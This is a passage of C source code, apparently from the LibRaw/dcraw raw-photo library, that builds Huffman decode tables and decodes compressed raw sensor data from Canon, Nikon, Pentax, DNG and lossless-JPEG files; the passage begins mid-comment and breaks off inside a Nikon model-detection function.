Construct a decode tree according the specification in *source.
The first 16 bytes specify how many codes should be 1-bit, 2-bit
3-bit, etc. Bytes after that are the leaf values.
For example, if the source is
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
then the code is
00 0x04
010 0x03
011 0x05
100 0x06
101 0x02
1100 0x07
1101 0x01
11100 0x08
11101 0x09
11110 0x00
111110 0x0a
1111110 0x0b
1111111 0xff
*/
ushort * CLASS make_decoder_ref (const uchar **source)
{
int max, len, h, i, j;
const uchar *count;
ushort *huff;
count = (*source += 16) - 17;
for (max=16; max && !count[max]; max--);
huff = (ushort *) calloc (1 + (1 << max), sizeof *huff);
merror (huff, "make_decoder()");
huff[0] = max;
for (h=len=1; len <= max; len++)
for (i=0; i < count[len]; i++, ++*source)
for (j=0; j < 1 << (max-len); j++)
if (h <= 1 << max)
huff[h++] = len << 8 | **source;
return huff;
}
ushort * CLASS make_decoder (const uchar *source)
{
return make_decoder_ref (&source);
}
void CLASS crw_init_tables (unsigned table, ushort *huff[2])
{
static const uchar first_tree[3][29] = {
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0,
0x04,0x03,0x05,0x06,0x02,0x07,0x01,0x08,0x09,0x00,0x0a,0x0b,0xff },
{ 0,2,2,3,1,1,1,1,2,0,0,0,0,0,0,0,
0x03,0x02,0x04,0x01,0x05,0x00,0x06,0x07,0x09,0x08,0x0a,0x0b,0xff },
{ 0,0,6,3,1,1,2,0,0,0,0,0,0,0,0,0,
0x06,0x05,0x07,0x04,0x08,0x03,0x09,0x02,0x00,0x0a,0x01,0x0b,0xff },
};
static const uchar second_tree[3][180] = {
{ 0,2,2,2,1,4,2,1,2,5,1,1,0,0,0,139,
0x03,0x04,0x02,0x05,0x01,0x06,0x07,0x08,
0x12,0x13,0x11,0x14,0x09,0x15,0x22,0x00,0x21,0x16,0x0a,0xf0,
0x23,0x17,0x24,0x31,0x32,0x18,0x19,0x33,0x25,0x41,0x34,0x42,
0x35,0x51,0x36,0x37,0x38,0x29,0x79,0x26,0x1a,0x39,0x56,0x57,
0x28,0x27,0x52,0x55,0x58,0x43,0x76,0x59,0x77,0x54,0x61,0xf9,
0x71,0x78,0x75,0x96,0x97,0x49,0xb7,0x53,0xd7,0x74,0xb6,0x98,
0x47,0x48,0x95,0x69,0x99,0x91,0xfa,0xb8,0x68,0xb5,0xb9,0xd6,
0xf7,0xd8,0x67,0x46,0x45,0x94,0x89,0xf8,0x81,0xd5,0xf6,0xb4,
0x88,0xb1,0x2a,0x44,0x72,0xd9,0x87,0x66,0xd4,0xf5,0x3a,0xa7,
0x73,0xa9,0xa8,0x86,0x62,0xc7,0x65,0xc8,0xc9,0xa1,0xf4,0xd1,
0xe9,0x5a,0x92,0x85,0xa6,0xe7,0x93,0xe8,0xc1,0xc6,0x7a,0x64,
0xe1,0x4a,0x6a,0xe6,0xb3,0xf1,0xd3,0xa5,0x8a,0xb2,0x9a,0xba,
0x84,0xa4,0x63,0xe5,0xc5,0xf3,0xd2,0xc4,0x82,0xaa,0xda,0xe4,
0xf2,0xca,0x83,0xa3,0xa2,0xc3,0xea,0xc2,0xe2,0xe3,0xff,0xff },
{ 0,2,2,1,4,1,4,1,3,3,1,0,0,0,0,140,
0x02,0x03,0x01,0x04,0x05,0x12,0x11,0x06,
0x13,0x07,0x08,0x14,0x22,0x09,0x21,0x00,0x23,0x15,0x31,0x32,
0x0a,0x16,0xf0,0x24,0x33,0x41,0x42,0x19,0x17,0x25,0x18,0x51,
0x34,0x43,0x52,0x29,0x35,0x61,0x39,0x71,0x62,0x36,0x53,0x26,
0x38,0x1a,0x37,0x81,0x27,0x91,0x79,0x55,0x45,0x28,0x72,0x59,
0xa1,0xb1,0x44,0x69,0x54,0x58,0xd1,0xfa,0x57,0xe1,0xf1,0xb9,
0x49,0x47,0x63,0x6a,0xf9,0x56,0x46,0xa8,0x2a,0x4a,0x78,0x99,
0x3a,0x75,0x74,0x86,0x65,0xc1,0x76,0xb6,0x96,0xd6,0x89,0x85,
0xc9,0xf5,0x95,0xb4,0xc7,0xf7,0x8a,0x97,0xb8,0x73,0xb7,0xd8,
0xd9,0x87,0xa7,0x7a,0x48,0x82,0x84,0xea,0xf4,0xa6,0xc5,0x5a,
0x94,0xa4,0xc6,0x92,0xc3,0x68,0xb5,0xc8,0xe4,0xe5,0xe6,0xe9,
0xa2,0xa3,0xe3,0xc2,0x66,0x67,0x93,0xaa,0xd4,0xd5,0xe7,0xf8,
0x88,0x9a,0xd7,0x77,0xc4,0x64,0xe2,0x98,0xa5,0xca,0xda,0xe8,
0xf3,0xf6,0xa9,0xb2,0xb3,0xf2,0xd2,0x83,0xba,0xd3,0xff,0xff },
{ 0,0,6,2,1,3,3,2,5,1,2,2,8,10,0,117,
0x04,0x05,0x03,0x06,0x02,0x07,0x01,0x08,
0x09,0x12,0x13,0x14,0x11,0x15,0x0a,0x16,0x17,0xf0,0x00,0x22,
0x21,0x18,0x23,0x19,0x24,0x32,0x31,0x25,0x33,0x38,0x37,0x34,
0x35,0x36,0x39,0x79,0x57,0x58,0x59,0x28,0x56,0x78,0x27,0x41,
0x29,0x77,0x26,0x42,0x76,0x99,0x1a,0x55,0x98,0x97,0xf9,0x48,
0x54,0x96,0x89,0x47,0xb7,0x49,0xfa,0x75,0x68,0xb6,0x67,0x69,
0xb9,0xb8,0xd8,0x52,0xd7,0x88,0xb5,0x74,0x51,0x46,0xd9,0xf8,
0x3a,0xd6,0x87,0x45,0x7a,0x95,0xd5,0xf6,0x86,0xb4,0xa9,0x94,
0x53,0x2a,0xa8,0x43,0xf5,0xf7,0xd4,0x66,0xa7,0x5a,0x44,0x8a,
0xc9,0xe8,0xc8,0xe7,0x9a,0x6a,0x73,0x4a,0x61,0xc7,0xf4,0xc6,
0x65,0xe9,0x72,0xe6,0x71,0x91,0x93,0xa6,0xda,0x92,0x85,0x62,
0xf3,0xc5,0xb2,0xa4,0x84,0xba,0x64,0xa5,0xb3,0xd2,0x81,0xe5,
0xd3,0xaa,0xc4,0xca,0xf2,0xb1,0xe4,0xd1,0x83,0x63,0xea,0xc3,
0xe2,0x82,0xf1,0xa3,0xc2,0xa1,0xc1,0xe3,0xa2,0xe1,0xff,0xff }
};
if (table > 2) table = 2;
huff[0] = make_decoder ( first_tree[table]);
huff[1] = make_decoder (second_tree[table]);
}
/*
Return 0 if the image starts with compressed data,
1 if it starts with uncompressed low-order bits.
In Canon compressed data, 0xff is always followed by 0x00.
*/
int CLASS canon_has_lowbits()
{
uchar test[0x4000];
int ret=1, i;
fseek (ifp, 0, SEEK_SET);
fread (test, 1, sizeof test, ifp);
for (i=540; i < sizeof test - 1; i++)
if (test[i] == 0xff) {
if (test[i+1]) return 1;
ret=0;
}
return ret;
}
void CLASS canon_load_raw()
{
ushort *pixel, *prow, *huff[2];
int nblocks, lowbits, i, c, row, r, save, val;
int block, diffbuf[64], leaf, len, diff, carry=0, pnum=0, base[2];
crw_init_tables (tiff_compress, huff);
lowbits = canon_has_lowbits();
if (!lowbits) maximum = 0x3ff;
fseek (ifp, 540 + lowbits*raw_height*raw_width/4, SEEK_SET);
zero_after_ff = 1;
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row+=8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
pixel = raw_image + row*raw_width;
nblocks = MIN (8, raw_height-row) * raw_width >> 6;
for (block=0; block < nblocks; block++) {
memset (diffbuf, 0, sizeof diffbuf);
for (i=0; i < 64; i++ ) {
leaf = gethuff(huff[i > 0]);
if (leaf == 0 && i) break;
if (leaf == 0xff) continue;
i += leaf >> 4;
len = leaf & 15;
if (len == 0) continue;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
if (i < 64) diffbuf[i] = diff;
}
diffbuf[0] += carry;
carry = diffbuf[0];
for (i=0; i < 64; i++ ) {
if (pnum++ % raw_width == 0)
base[0] = base[1] = 512;
if ((pixel[(block << 6) + i] = base[i & 1] += diffbuf[i]) >> 10)
derror();
}
}
if (lowbits) {
save = ftell(ifp);
fseek (ifp, 26 + row*raw_width/4, SEEK_SET);
for (prow=pixel, i=0; i < raw_width*2; i++) {
c = fgetc(ifp);
for (r=0; r < 8; r+=2, prow++) {
val = (*prow << 2) + ((c >> r) & 3);
if (raw_width == 2672 && val < 512) val += 2;
*prow = val;
}
}
fseek (ifp, save, SEEK_SET);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
FORC(2) free (huff[c]);
throw;
}
#endif
FORC(2) free (huff[c]);
}
//@end COMMON
struct jhead {
int algo, bits, high, wide, clrs, sraw, psv, restart, vpred[6];
ushort quant[64], idct[64], *huff[20], *free[20], *row;
};
//@out COMMON
int CLASS ljpeg_start (struct jhead *jh, int info_only)
{
ushort c, tag, len;
int cnt = 0;
uchar data[0x10000];
const uchar *dp;
memset (jh, 0, sizeof *jh);
jh->restart = INT_MAX;
if ((fgetc(ifp),fgetc(ifp)) != 0xd8) return 0;
do {
if(feof(ifp)) return 0;
if(cnt++ > 1024) return 0; // 1024 tags limit
if (!fread (data, 2, 2, ifp)) return 0;
tag = data[0] << 8 | data[1];
len = (data[2] << 8 | data[3]) - 2;
if (tag <= 0xff00) return 0;
fread (data, 1, len, ifp);
switch (tag) {
case 0xffc3: // start of frame; lossless, Huffman
jh->sraw = ((data[7] >> 4) * (data[7] & 15) - 1) & 3;
case 0xffc1:
case 0xffc0:
jh->algo = tag & 0xff;
jh->bits = data[0];
jh->high = data[1] << 8 | data[2];
jh->wide = data[3] << 8 | data[4];
jh->clrs = data[5] + jh->sraw;
if (len == 9 && !dng_version) getc(ifp);
break;
case 0xffc4: // define Huffman tables
if (info_only) break;
for (dp = data; dp < data+len && !((c = *dp++) & -20); )
jh->free[c] = jh->huff[c] = make_decoder_ref (&dp);
break;
case 0xffda: // start of scan
jh->psv = data[1+data[0]*2];
jh->bits -= data[3+data[0]*2] & 15;
break;
case 0xffdb:
FORC(64) jh->quant[c] = data[c*2+1] << 8 | data[c*2+2];
break;
case 0xffdd:
jh->restart = data[0] << 8 | data[1];
}
} while (tag != 0xffda);
if (jh->bits > 16 || jh->clrs > 6 ||
!jh->bits || !jh->high || !jh->wide || !jh->clrs) return 0;
if (info_only) return 1;
if (!jh->huff[0]) return 0;
FORC(19) if (!jh->huff[c+1]) jh->huff[c+1] = jh->huff[c];
if (jh->sraw) {
FORC(4) jh->huff[2+c] = jh->huff[1];
FORC(jh->sraw) jh->huff[1+c] = jh->huff[0];
}
jh->row = (ushort *) calloc (jh->wide*jh->clrs, 4);
merror (jh->row, "ljpeg_start()");
return zero_after_ff = 1;
}
void CLASS ljpeg_end (struct jhead *jh)
{
int c;
FORC4 if (jh->free[c]) free (jh->free[c]);
free (jh->row);
}
int CLASS ljpeg_diff (ushort *huff)
{
int len, diff;
if(!huff)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
len = gethuff(huff);
if (len == 16 && (!dng_version || dng_version >= 0x1010000))
return -32768;
diff = getbits(len);
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - 1;
return diff;
}
ushort * CLASS ljpeg_row (int jrow, struct jhead *jh)
{
int col, c, diff, pred, spred=0;
ushort mark=0, *row[3];
if (jrow * jh->wide % jh->restart == 0) {
FORC(6) jh->vpred[c] = 1 << (jh->bits-1);
if (jrow) {
fseek (ifp, -2, SEEK_CUR);
do mark = (mark << 8) + (c = fgetc(ifp));
while (c != EOF && mark >> 4 != 0xffd);
}
getbits(-1);
}
FORC3 row[c] = jh->row + jh->wide*jh->clrs*((jrow+c) & 1);
for (col=0; col < jh->wide; col++)
FORC(jh->clrs) {
diff = ljpeg_diff (jh->huff[c]);
if (jh->sraw && c <= jh->sraw && (col | c))
pred = spred;
else if (col) pred = row[0][-jh->clrs];
else pred = (jh->vpred[c] += diff) - diff;
if (jrow && col) switch (jh->psv) {
case 1: break;
case 2: pred = row[1][0]; break;
case 3: pred = row[1][-jh->clrs]; break;
case 4: pred = pred + row[1][0] - row[1][-jh->clrs]; break;
case 5: pred = pred + ((row[1][0] - row[1][-jh->clrs]) >> 1); break;
case 6: pred = row[1][0] + ((pred - row[1][-jh->clrs]) >> 1); break;
case 7: pred = (pred + row[1][0]) >> 1; break;
default: pred = 0;
}
if ((**row = pred + diff) >> jh->bits) derror();
if (c <= jh->sraw) spred = **row;
row[0]++; row[1]++;
}
return row[2];
}
void CLASS lossless_jpeg_load_raw()
{
int jwide, jhigh, jrow, jcol, val, jidx, i, j, row=0, col=0;
struct jhead jh;
ushort *rp;
if (!ljpeg_start (&jh, 0)) return;
if(jh.wide<1 || jh.high<1 || jh.clrs<1 || jh.bits <1)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 2);
#endif
jwide = jh.wide * jh.clrs;
jhigh = jh.high;
if(jh.clrs == 4 && jwide >= raw_width*2) jhigh *= 2;
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
if (load_flags & 1)
row = jrow & 1 ? height-1-jrow/2 : jrow/2;
for (jcol=0; jcol < jwide; jcol++) {
val = curve[*rp++];
if (cr2_slice[0]) {
jidx = jrow*jwide + jcol;
i = jidx / (cr2_slice[1]*raw_height);
if ((j = i >= cr2_slice[0]))
i = cr2_slice[0];
jidx -= i * (cr2_slice[1]*raw_height);
row = jidx / cr2_slice[1+j];
col = jidx % cr2_slice[1+j] + i*cr2_slice[1];
}
if (raw_width == 3984 && (col -= 2) < 0)
col += (row--,raw_width);
if(row>raw_height)
#ifdef LIBRAW_LIBRARY_BUILD
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#else
longjmp (failure, 3);
#endif
if ((unsigned) row < raw_height) RAW(row,col) = val;
if (++col >= raw_width)
col = (row++,0);
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw;
}
#endif
ljpeg_end (&jh);
}
void CLASS canon_sraw_load_raw()
{
struct jhead jh;
short *rp=0, (*ip)[4];
int jwide, slice, scol, ecol, row, col, jrow=0, jcol=0, pix[3], c;
int v[3]={0,0,0}, ver, hue;
#ifdef LIBRAW_LIBRARY_BUILD
int saved_w = width, saved_h = height;
#endif
char *cp;
if (!ljpeg_start (&jh, 0) || jh.clrs < 4) return;
jwide = (jh.wide >>= 1) * jh.clrs;
#ifdef LIBRAW_LIBRARY_BUILD
if(load_flags & 256)
{
width = raw_width;
height = raw_height;
}
try {
#endif
for (ecol=slice=0; slice <= cr2_slice[0]; slice++) {
scol = ecol;
ecol += cr2_slice[1] * 2 / jh.clrs;
if (!cr2_slice[0] || ecol > raw_width-1) ecol = raw_width & -2;
for (row=0; row < height; row += (jh.clrs >> 1) - 1) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
ip = (short (*)[4]) image + row*width;
for (col=scol; col < ecol; col+=2, jcol+=jh.clrs) {
if ((jcol %= jwide) == 0)
rp = (short *) ljpeg_row (jrow++, &jh);
if (col >= width) continue;
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
FORC (jh.clrs-2)
{
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col + (c >> 1)*width + (c & 1)][1] = ip[col + (c >> 1)*width + (c & 1)][2] = 8192;
}
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB)
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 8192;
ip[col][2] = rp[jcol+jh.clrs-1] - 8192;
}
else
#endif
{
FORC (jh.clrs-2)
ip[col + (c >> 1)*width + (c & 1)][0] = rp[jcol+c];
ip[col][1] = rp[jcol+jh.clrs-2] - 16384;
ip[col][2] = rp[jcol+jh.clrs-1] - 16384;
}
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
if(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_INTERPOLATE)
{
ljpeg_end (&jh);
maximum = 0x3fff;
height = saved_h;
width = saved_w;
return;
}
#endif
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (cp=model2; *cp && !isdigit(*cp); cp++);
sscanf (cp, "%d.%d.%d", v, v+1, v+2);
ver = (v[0]*1000 + v[1])*1000 + v[2];
hue = (jh.sraw+1) << 2;
if (unique_id >= 0x80000281 || (unique_id == 0x80000218 && ver > 1000006))
hue = jh.sraw << 1;
ip = (short (*)[4]) image;
rp = ip[0];
for (row=0; row < height; row++, ip+=width) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (row & (jh.sraw >> 1))
{
for (col=0; col < width; col+=2)
for (c=1; c < 3; c++)
if (row == height-1)
{
ip[col][c] = ip[col-width][c];
}
else
{
ip[col][c] = (ip[col-width][c] + ip[col+width][c] + 1) >> 1;
}
}
for (col=1; col < width; col+=2)
for (c=1; c < 3; c++)
if (col == width-1)
ip[col][c] = ip[col-1][c];
else ip[col][c] = (ip[col-1][c] + ip[col+1][c] + 1) >> 1;
}
#ifdef LIBRAW_LIBRARY_BUILD
if(!(imgdata.params.raw_processing_options & LIBRAW_PROCESSING_SRAW_NO_RGB) )
#endif
for ( ; rp < ip[0]; rp+=4) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (unique_id == 0x80000218 ||
unique_id == 0x80000250 ||
unique_id == 0x80000261 ||
unique_id == 0x80000281 ||
unique_id == 0x80000287) {
rp[1] = (rp[1] << 2) + hue;
rp[2] = (rp[2] << 2) + hue;
pix[0] = rp[0] + (( 50*rp[1] + 22929*rp[2]) >> 14);
pix[1] = rp[0] + ((-5640*rp[1] - 11751*rp[2]) >> 14);
pix[2] = rp[0] + ((29040*rp[1] - 101*rp[2]) >> 14);
} else {
if (unique_id < 0x80000218) rp[0] -= 512;
pix[0] = rp[0] + rp[2];
pix[2] = rp[0] + rp[1];
pix[1] = rp[0] + ((-778*rp[1] - (rp[2] << 11)) >> 12);
}
FORC3 rp[c] = CLIP(pix[c] * sraw_mul[c] >> 10);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
height = saved_h;
width = saved_w;
#endif
ljpeg_end (&jh);
maximum = 0x3fff;
}
void CLASS adobe_copy_pixel (unsigned row, unsigned col, ushort **rp)
{
int c;
if (tiff_samples == 2 && shot_select) (*rp)++;
if (raw_image) {
if (row < raw_height && col < raw_width)
RAW(row,col) = curve[**rp];
*rp += tiff_samples;
} else {
if (row < height && col < width)
FORC(tiff_samples)
image[row*width+col][c] = curve[(*rp)[c]];
*rp += tiff_samples;
}
if (tiff_samples == 2 && shot_select) (*rp)--;
}
void CLASS ljpeg_idct (struct jhead *jh)
{
int c, i, j, len, skip, coef;
float work[3][8][8];
static float cs[106] = { 0 };
static const uchar zigzag[80] =
{ 0, 1, 8,16, 9, 2, 3,10,17,24,32,25,18,11, 4, 5,12,19,26,33,
40,48,41,34,27,20,13, 6, 7,14,21,28,35,42,49,56,57,50,43,36,
29,22,15,23,30,37,44,51,58,59,52,45,38,31,39,46,53,60,61,54,
47,55,62,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63,63 };
if (!cs[0])
FORC(106) cs[c] = cos((c & 31)*M_PI/16)/2;
memset (work, 0, sizeof work);
work[0][0][0] = jh->vpred[0] += ljpeg_diff (jh->huff[0]) * jh->quant[0];
for (i=1; i < 64; i++ ) {
len = gethuff (jh->huff[16]);
i += skip = len >> 4;
if (!(len &= 15) && skip < 15) break;
coef = getbits(len);
if ((coef & (1 << (len-1))) == 0)
coef -= (1 << len) - 1;
((float *)work)[zigzag[i]] = coef * jh->quant[i];
}
FORC(8) work[0][0][c] *= M_SQRT1_2;
FORC(8) work[0][c][0] *= M_SQRT1_2;
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[1][i][j] += work[0][i][c] * cs[(j*2+1)*c];
for (i=0; i < 8; i++)
for (j=0; j < 8; j++)
FORC(8) work[2][i][j] += work[1][c][j] * cs[(i*2+1)*c];
FORC(64) jh->idct[c] = CLIP(((float *)work[2])[c]+0.5);
}
void CLASS lossless_dng_load_raw()
{
unsigned save, trow=0, tcol=0, jwide, jrow, jcol, row, col, i, j;
struct jhead jh;
ushort *rp;
while (trow < raw_height) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
save = ftell(ifp);
if (tile_length < INT_MAX)
fseek (ifp, get4(), SEEK_SET);
if (!ljpeg_start (&jh, 0)) break;
jwide = jh.wide;
if (filters) jwide *= jh.clrs;
jwide /= MIN (is_raw, tiff_samples);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
switch (jh.algo) {
case 0xc1:
jh.vpred[0] = 16384;
getbits(-1);
for (jrow=0; jrow+7 < jh.high; jrow += 8) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (jcol=0; jcol+7 < jh.wide; jcol += 8) {
ljpeg_idct (&jh);
rp = jh.idct;
row = trow + jcol/tile_width + jrow*2;
col = tcol + jcol%tile_width;
for (i=0; i < 16; i+=2)
for (j=0; j < 8; j++)
adobe_copy_pixel (row+i, col+j, &rp);
}
}
break;
case 0xc3:
for (row=col=jrow=0; jrow < jh.high; jrow++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
rp = ljpeg_row (jrow, &jh);
for (jcol=0; jcol < jwide; jcol++) {
adobe_copy_pixel (trow+row, tcol+col, &rp);
if (++col >= tile_width || col >= raw_width)
row += 1 + (col = 0);
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
ljpeg_end (&jh);
throw ;
}
#endif
fseek (ifp, save+4, SEEK_SET);
if ((tcol += tile_width) >= raw_width)
trow += tile_length + (tcol = 0);
ljpeg_end (&jh);
}
}
void CLASS packed_dng_load_raw()
{
ushort *pixel, *rp;
int row, col;
pixel = (ushort *) calloc (raw_width, tiff_samples*sizeof *pixel);
merror (pixel, "packed_dng_load_raw()");
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (row=0; row < raw_height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (tiff_bps == 16)
read_shorts (pixel, raw_width * tiff_samples);
else {
getbits(-1);
for (col=0; col < raw_width * tiff_samples; col++)
pixel[col] = getbits(tiff_bps);
}
for (rp=pixel, col=0; col < raw_width; col++)
adobe_copy_pixel (row, col, &rp);
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (pixel);
throw ;
}
#endif
free (pixel);
}
void CLASS pentax_load_raw()
{
ushort bit[2][15], huff[4097];
int dep, row, col, diff, c, i;
ushort vpred[2][2] = {{0,0},{0,0}}, hpred[2];
fseek (ifp, meta_offset, SEEK_SET);
dep = (get2() + 12) & 15;
fseek (ifp, 12, SEEK_CUR);
FORC(dep) bit[0][c] = get2();
FORC(dep) bit[1][c] = fgetc(ifp);
FORC(dep)
for (i=bit[0][c]; i <= ((bit[0][c]+(4096 >> bit[1][c])-1) & 4095); )
huff[++i] = bit[1][c] << 8 | c;
huff[0] = 12;
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
diff = ljpeg_diff (huff);
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
RAW(row,col) = hpred[col & 1];
if (hpred[col & 1] >> tiff_bps) derror();
}
}
}
#ifdef LIBRAW_LIBRARY_BUILD
void CLASS nikon_coolscan_load_raw()
{
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
int bypp = tiff_bps <= 8 ? 1 : 2;
int bufsize = width * 3 * bypp;
if (tiff_bps <= 8)
gamma_curve(1.0 / imgdata.params.coolscan_nef_gamma, 0., 1, 255);
else
gamma_curve(1.0/imgdata.params.coolscan_nef_gamma,0.,1,65535);
fseek (ifp, data_offset, SEEK_SET);
unsigned char *buf = (unsigned char*)malloc(bufsize);
unsigned short *ubuf = (unsigned short *)buf;
for(int row = 0; row < raw_height; row++)
{
int red = fread (buf, 1, bufsize, ifp);
unsigned short (*ip)[4] = (unsigned short (*)[4]) image + row*width;
if(tiff_bps <= 8)
for(int col=0; col<width;col++)
{
ip[col][0] = curve[buf[col*3]];
ip[col][1] = curve[buf[col*3+1]];
ip[col][2] = curve[buf[col*3+2]];
ip[col][3]=0;
}
else
for(int col=0; col<width;col++)
{
ip[col][0] = curve[ubuf[col*3]];
ip[col][1] = curve[ubuf[col*3+1]];
ip[col][2] = curve[ubuf[col*3+2]];
ip[col][3]=0;
}
}
free(buf);
}
#endif
void CLASS nikon_load_raw()
{
static const uchar nikon_tree[][32] = {
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy */
5,4,3,6,2,7,1,0,8,9,11,10,12 },
{ 0,1,5,1,1,1,1,1,1,2,0,0,0,0,0,0, /* 12-bit lossy after split */
0x39,0x5a,0x38,0x27,0x16,5,4,3,2,1,0,11,12,12 },
{ 0,1,4,2,3,1,2,0,0,0,0,0,0,0,0,0, /* 12-bit lossless */
5,4,6,3,7,2,8,1,9,0,10,11,12 },
{ 0,1,4,3,1,1,1,1,1,2,0,0,0,0,0,0, /* 14-bit lossy */
5,6,4,7,8,3,9,2,1,0,10,11,12,13,14 },
{ 0,1,5,1,1,1,1,1,1,1,2,0,0,0,0,0, /* 14-bit lossy after split */
8,0x5c,0x4b,0x3a,0x29,7,6,5,4,3,2,1,0,13,14 },
{ 0,1,4,2,2,3,1,2,0,0,0,0,0,0,0,0, /* 14-bit lossless */
7,6,8,5,9,4,10,3,11,12,2,0,1,13,14 } };
ushort *huff, ver0, ver1, vpred[2][2], hpred[2], csize;
int i, min, max, step=0, tree=0, split=0, row, col, len, shl, diff;
fseek (ifp, meta_offset, SEEK_SET);
ver0 = fgetc(ifp);
ver1 = fgetc(ifp);
if (ver0 == 0x49 || ver1 == 0x58)
fseek (ifp, 2110, SEEK_CUR);
if (ver0 == 0x46) tree = 2;
if (tiff_bps == 14) tree += 3;
read_shorts (vpred[0], 4);
max = 1 << tiff_bps & 0x7fff;
if ((csize = get2()) > 1)
step = max / (csize-1);
if (ver0 == 0x44 && ver1 == 0x20 && step > 0) {
for (i=0; i < csize; i++)
curve[i*step] = get2();
for (i=0; i < max; i++)
curve[i] = ( curve[i-i%step]*(step-i%step) +
curve[i-i%step+step]*(i%step) ) / step;
fseek (ifp, meta_offset+562, SEEK_SET);
split = get2();
} else if (ver0 != 0x46 && csize <= 0x4001)
read_shorts (curve, max=csize);
while (curve[max-2] == curve[max-1]) max--;
huff = make_decoder (nikon_tree[tree]);
fseek (ifp, data_offset, SEEK_SET);
getbits(-1);
#ifdef LIBRAW_LIBRARY_BUILD
try {
#endif
for (min=row=0; row < height; row++) {
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
if (split && row == split) {
free (huff);
huff = make_decoder (nikon_tree[tree+1]);
max += (min = 16) << 1;
}
for (col=0; col < raw_width; col++) {
i = gethuff(huff);
len = i & 15;
shl = i >> 4;
diff = ((getbits(len-shl) << 1) + 1) << shl >> 1;
if ((diff & (1 << (len-1))) == 0)
diff -= (1 << len) - !shl;
if (col < 2) hpred[col] = vpred[row & 1][col] += diff;
else hpred[col & 1] += diff;
if ((ushort)(hpred[col & 1] + min) >= max) derror();
RAW(row,col) = curve[LIM((short)hpred[col & 1],0,0x3fff)];
}
}
#ifdef LIBRAW_LIBRARY_BUILD
} catch (...) {
free (huff);
throw;
}
#endif
free (huff);
}
void CLASS nikon_yuv_load_raw()
{
#ifdef LIBRAW_LIBRARY_BUILD
if(!image)
throw LIBRAW_EXCEPTION_IO_CORRUPT;
#endif
int row, col, yuv[4], rgb[3], b, c;
UINT64 bitbuf=0;
float cmul[4];
FORC4 { cmul[c] = cam_mul[c]>0.001f?cam_mul[c]:1.f; }
for (row=0; row < raw_height; row++)
{
#ifdef LIBRAW_LIBRARY_BUILD
checkCancel();
#endif
for (col=0; col < raw_width; col++) {
if (!(b = col & 1)) {
bitbuf = 0;
FORC(6) bitbuf |= (UINT64) fgetc(ifp) << c*8;
FORC(4) yuv[c] = (bitbuf >> c*12 & 0xfff) - (c >> 1 << 11);
}
rgb[0] = yuv[b] + 1.370705*yuv[3];
rgb[1] = yuv[b] - 0.337633*yuv[2] - 0.698001*yuv[3];
rgb[2] = yuv[b] + 1.732446*yuv[2];
FORC3 image[row*width+col][c] = curve[LIM(rgb[c],0,0xfff)] / cmul[c];
}
}
}
/*
Returns 1 for a Coolpix 995, 0 for anything else.
*/
int CLASS nikon_e995()
{
int i, histo[256];
const uchar often[] = { 0x00, 0x55, 0xaa, 0xff };
memset (histo, 0, sizeof histo);
fseek (ifp, -2000, SEEK_END);
for (i=0; i < 2000; i++)
histo[fgetc(ifp)]++;
for (i=0; i < 4; i++)
